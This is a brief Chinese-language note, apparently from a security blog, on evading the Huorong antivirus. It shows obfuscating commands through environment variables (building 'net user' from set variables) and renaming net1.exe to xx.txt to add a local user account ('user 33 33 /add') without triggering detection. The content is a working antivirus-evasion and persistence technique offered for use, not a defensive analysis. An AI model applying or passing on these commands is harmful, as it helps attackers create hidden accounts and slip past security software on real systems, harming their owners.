1.常规套路1)利用环境变量执行命令2.绕过火绒的行为检查(bypass 火绒) 1.常规套路 1)利用环境变量执行命令set a=123执行net user命令 set a=netset b=user%a% %b% 2.绕过火绒的行为检查(bypass 火绒)需要管理员权限(顺带说一句,管理权限在进程里面干不掉火绒的进程)正常的执行——肯定拦截的嘛绕过方式:使用net1.exe ,这个也是系统自带的绕过如下:**copy net1.exe xx.txt && xx.txt user 33 33 /add**此时火绒不会拦截